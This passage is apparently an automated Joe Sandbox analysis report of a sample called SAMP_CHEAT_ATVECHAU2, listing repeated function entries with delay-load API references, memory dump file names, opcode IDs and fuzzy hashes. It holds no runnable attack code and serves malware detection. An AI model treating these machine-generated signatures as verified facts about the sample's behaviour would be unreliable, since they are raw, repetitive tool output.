                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 70e37f72834bf39b04955a801c3c61f0141950f62c14a5389dc6b976d52f4ffb
                                                    • Instruction ID: e0ba01846caddeb4d2bf08555e9f1bfeaa0b69827ae4fe0aa847b64f71040fd2
                                                    • Opcode Fuzzy Hash: 70e37f72834bf39b04955a801c3c61f0141950f62c14a5389dc6b976d52f4ffb
                                                    • Instruction Fuzzy Hash: 9EB012C22685007E7104510C2C06F3F030DC0C5F163309C2FFC0CC11C0E8404C080471
                                                    Function 00D0E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: cd8a476f415976b4c5b396298c966588d4b707729b46c5d86a792d740757f372
                                                    • Instruction ID: b80b2dd7e0395e481f9fe08ffaad3b8cc09630dd8117fed883e8aa87137662f3
                                                    • Opcode Fuzzy Hash: cd8a476f415976b4c5b396298c966588d4b707729b46c5d86a792d740757f372
                                                    • Instruction Fuzzy Hash: 0BB012C22685407D7144510C2D06E3F470DC0C5F16330DC2FFC0CC11C0E8404C090471
                                                    Function 00D0E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 89d55373ba214efb284a48f4c8bb4a1b00d6da8002eff466ed0f86f230f856da
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 89d55373ba214efb284a48f4c8bb4a1b00d6da8002eff466ed0f86f230f856da
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 5a923cacb46d752f724ecbd071027de559e6b00777fe6cc1a244e0a87b7f3bf7
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 5a923cacb46d752f724ecbd071027de559e6b00777fe6cc1a244e0a87b7f3bf7
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a20981827d560458f83cecc6569edbec2685e37246b2e166817db663e22bd6e1
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: a20981827d560458f83cecc6569edbec2685e37246b2e166817db663e22bd6e1
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1f3732c55258669f9efb94e76c97a1c43369f0f8a3762a02356f7a83619c57f8
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 1f3732c55258669f9efb94e76c97a1c43369f0f8a3762a02356f7a83619c57f8
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b4511174bb127f0e517ffaef944be12a30ec52d43d9a4b96339821d6e3bbe2ae
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: b4511174bb127f0e517ffaef944be12a30ec52d43d9a4b96339821d6e3bbe2ae
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 57aa539534825db0fa61bcff381c6be4bce3a16901559cf40773c85351621fc0
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 57aa539534825db0fa61bcff381c6be4bce3a16901559cf40773c85351621fc0
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9096e2e4961989eda81322ef97b1b1cad92f55a963c52e76d2a4f6bfc7f6822e
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 9096e2e4961989eda81322ef97b1b1cad92f55a963c52e76d2a4f6bfc7f6822e
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: cc0e1cff1be51c928053efee3441bb6836d6402082094fc9e58678cf5f7f0b0f
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: cc0e1cff1be51c928053efee3441bb6836d6402082094fc9e58678cf5f7f0b0f
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: e12ca535399d09ed3bb94a97afbf882011c51a6dc9a3fcd7f1d1cdf60aef718b
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: e12ca535399d09ed3bb94a97afbf882011c51a6dc9a3fcd7f1d1cdf60aef718b
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 31d02682ecaf792777bea12362f7796985d64106322240d1f3f8642d9f307f01
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 31d02682ecaf792777bea12362f7796985d64106322240d1f3f8642d9f307f01
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 75f7ce35e7c240f9fb60a6a6973803224ae3c53d36465f81dd476ee98a3490d6
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 75f7ce35e7c240f9fb60a6a6973803224ae3c53d36465f81dd476ee98a3490d6
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    Function 00D0E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 7b820466728d3fc3caca927b6fffa6961f46b97bd7929f3e8565a10cce5b8635
                                                    • Instruction ID: 18de05b4b2f137f832524e3e1e482b7caeaf9eda413850b7e191df696e429b65
                                                    • Opcode Fuzzy Hash: 7b820466728d3fc3caca927b6fffa6961f46b97bd7929f3e8565a10cce5b8635
                                                    • Instruction Fuzzy Hash: 33A001E62A95627DB10862526D06E3B471ED4D2B2A330A92EF869A54D1AC805C4918B2
                                                    Function 00D0E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
